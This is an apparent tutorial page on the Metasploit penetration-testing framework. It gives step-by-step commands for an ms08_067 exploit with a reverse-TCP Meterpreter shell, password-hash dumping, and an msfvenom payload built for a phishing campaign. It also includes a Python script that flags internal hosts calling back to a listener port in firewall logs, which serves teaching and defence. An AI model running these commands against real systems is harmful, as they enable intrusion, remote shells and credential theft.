Metasploit Framework
Metasploit is an open-source penetration testing framework developed by Rapid7. It is widely used for developing and executing exploit code against a remote target machine. The framework provides tools to perform various tasks in penetration testing, such as information gathering, vulnerability scanning, exploitation, and post-exploitation.
Key Components of Metasploit
Modules:
Exploit Modules: Contains the code to exploit specific vulnerabilities.
Payload Modules: Includes code that runs on the target machine after exploitation (e.g., reverse shells).
Auxiliary Modules: Used for scanning, fuzzing, and other non-exploit functionality.
Post Modules: Used for post-exploitation activities on a compromised system.
Encoders: Used to encode payloads to avoid detection.
NOPs: No-operation instructions used to pad out payloads.
Meterpreter: An advanced, extensible payload that provides an interactive shell for executing commands on the target machine.
Database: Metasploit integrates with PostgreSQL to store scan results, exploitation attempts, and other data.
Armitage: A graphical user interface (GUI) for Metasploit, providing visual aids for managing sessions and exploits.
Common Use Cases for Metasploit
Vulnerability Scanning and Exploitation
Information Gathering
Post-Exploitation
Social Engineering
Web Application Testing
Wireless Attacks
Password Attacks
Evasion Techniques
Use Cases with Metasploit
1. Vulnerability Scanning and Exploitation
Example: Exploiting a known vulnerability in a Windows machine using the ms08_067_netapi exploit.
Steps:
Launch Metasploit:
msfconsole
Search for the exploit:
search ms08_067
Select the exploit:
use exploit/windows/smb/ms08_067_netapi
Set the target:
set RHOST <target_ip>
Set the payload:
set payload windows/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT 4444
Run the exploit:
exploit
2. Information Gathering
Example: Scanning a network for open ports and services.
Steps:
Launch Metasploit:
msfconsole
Use auxiliary scanner:
use auxiliary/scanner/portscan/tcp
Set the target range:
set RHOSTS 192.168.1.0/24
Run the scan:
run
3. Post-Exploitation
Example: Collecting password hashes from a compromised machine.
Steps:
Exploit the target and get a Meterpreter session:
exploit
Dump password hashes:
meterpreter > hashdump
4. Social Engineering
Example: Creating a malicious payload for a phishing campaign.
Steps:
Generate the payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4444 -f exe > payload.exe
Set up a listener:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT 4444
exploit
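Every command above shares one observable that a defender can key on: the reverse_tcp payload connects out from the victim to the listener at LHOST:LPORT, and a single multi/handler set up for a phishing campaign is contacted by each user who ran the payload. The following Python example is added here and is not part of the original page or of the Metasploit project; it scans constructed firewall log lines for internal hosts calling back to a watched port, groups them per listener, and rates a listener contacted by several internal hosts higher. The log format, the watched-port set (4444, as used throughout this page) and the RFC 1918 "internal" ranges are assumptions to be adapted to your environment.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime

# Ports to watch. 4444 is the LPORT used in every command on this page; the
# set is an assumption and should be tuned to your own environment.
SUSPICIOUS_PORTS = {4444}

# RFC 1918 ranges treated as "inside" (assumption: adjust to your address plan).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample firewall log. The format is an assumption for this example:
# "<iso-timestamp> <ALLOW|DENY> <src> -> <dst>:<port>"
SAMPLE_LOG = """\
2024-05-01T10:00:00 ALLOW 192.168.1.20 -> 203.0.113.9:4444
2024-05-01T10:00:05 ALLOW 192.168.1.20 -> 203.0.113.9:4444
2024-05-01T10:01:10 ALLOW 192.168.1.31 -> 203.0.113.9:4444
2024-05-01T10:02:00 ALLOW 192.168.1.20 -> 93.184.216.34:443
2024-05-01T10:03:00 DENY 192.168.1.45 -> 203.0.113.9:4444
2024-05-01T10:04:00 ALLOW 192.168.1.20 -> 192.168.1.50:4444
2024-05-01T10:05:00 ALLOW 203.0.113.77 -> 192.168.1.10:4444
"""


def is_internal(ip):
    """True when the address falls inside one of the assumed internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_line(line):
    """Parse one log line into a dict; raises ValueError on any other shape."""
    fields = line.split()
    if len(fields) != 5 or fields[3] != "->":
        raise ValueError(f"unexpected log format: {line!r}")
    ts, action, src, _, dst_port = fields
    dst, port = dst_port.rsplit(":", 1)
    return {"ts": datetime.fromisoformat(ts), "action": action,
            "src": src, "dst": dst, "dport": int(port)}


def find_callbacks(lines, ports=SUSPICIOUS_PORTS):
    """Summarise internal-to-listener connections on watched ports, per listener.

    Only connections whose source is internal count (inbound traffic to 4444 is
    not a callback). Denied attempts still name the calling host, so they are
    kept. Severity is 'high' when two or more distinct internal hosts called the
    same listener, which is what one handler catching several phished users
    looks like; a single caller is 'medium'.
    """
    acc = defaultdict(lambda: {"sources": set(), "allowed": 0, "denied": 0,
                               "first_seen": None})
    for line in lines:
        if not line.strip():
            continue
        c = parse_line(line)
        if c["dport"] not in ports or not is_internal(c["src"]):
            continue
        s = acc[f'{c["dst"]}:{c["dport"]}']
        s["sources"].add(c["src"])
        s["allowed" if c["action"] == "ALLOW" else "denied"] += 1
        if s["first_seen"] is None or c["ts"] < s["first_seen"]:
            s["first_seen"] = c["ts"]

    report = {}
    for listener, s in acc.items():
        dst = listener.rsplit(":", 1)[0]
        report[listener] = {
            "sources": sorted(s["sources"]),
            "allowed": s["allowed"],
            "denied": s["denied"],
            "first_seen": s["first_seen"].isoformat(),
            "external_listener": not is_internal(dst),
            "severity": "high" if len(s["sources"]) >= 2 else "medium",
        }
    return report


if __name__ == "__main__":
    for listener, info in find_callbacks(SAMPLE_LOG.splitlines()).items():
        print(f"[{info['severity']}] {listener} external={info['external_listener']} "
              f"callers={info['sources']} allowed={info['allowed']} denied={info['denied']}")
```

On the sample log this reports the external listener 203.0.113.9:4444 as high (three distinct internal callers, one of them blocked) and the internal listener 192.168.1.50:4444 as medium; the inbound line to 192.168.1.10:4444 is ignored because its source is not internal. In practice a fixed port list is only a starting point, since LPORT is freely chosen; the per-listener grouping and the multi-caller rating are the parts that transfer to other ports.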
Detailed Metasploit Options
msfconsole
Basic Commands:
search <term>: Search for exploits, payloads, and other modules.
use <module_path>: Load a specific module.
show options: Display options for the current module.
set <option> <value>: Set a specific option value.
exploit: Run the selected exploit module.
run: Run the selected auxiliary module.
sessions -i <id>: Interact with a specific session.
msfvenom
Usage:
-p <payload>: Specify the payload to use.
LHOST=<your_ip>: Set the local host IP.
LPORT=<your_port>: Set the local port.
-f <format>: Specify the output format (e.g., exe, elf, raw).
-o <output_file>: Specify the output file name.
Example:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > payload.exe
References
Metasploit Documentation: Metasploit Docs
Metasploit Unleashed (Offensive Security): Metasploit Unleashed
Metasploit GitHub Repository: Metasploit GitHub
Exploit Database: Exploit DB
By leveraging Metasploit's powerful capabilities, penetration testers can identify and exploit vulnerabilities, gather crucial information, and perform detailed post-exploitation tasks to assess and improve the security posture of an organization.